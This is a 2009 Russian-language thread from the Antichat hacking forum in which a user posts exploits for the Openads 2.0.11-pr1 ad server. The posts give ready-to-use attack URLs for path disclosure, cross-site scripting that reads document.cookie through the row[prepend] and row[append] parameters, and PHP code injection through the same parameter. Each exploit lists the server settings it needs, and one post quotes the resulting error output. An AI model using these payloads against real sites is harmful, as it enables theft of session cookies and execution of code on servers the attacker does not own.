Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости Openads 2.0.11-pr1 (https://forum.antichat.xyz/showthread.php?t=142456)

(Dm) 20.09.2009 01:10

Уязвимости Openads 2.0.11-pr1
 
Это последняя версия движка в ветке OpenX 2.0.
Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел...

>> Раскрытие пути:
условия:
+ display_errors = On

сплоит: http://openads/adlayer.php?layerstyle=antichat

>> XSS
условия:
+ register_globals = On

сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера

>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On


сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера

(Dm) 20.10.2009 07:39

>> Раскрытие пути:
условия:
+ display_errors = On

сплоит: http://openads/adclick.php?bannerid=id&antichat=xe%0Ak%0A
id - номер существующего баннера

Цитата:

Warning: Header may not contain more than a single header, new line detected. in /path/adclick.php on line 210


Время: 22:49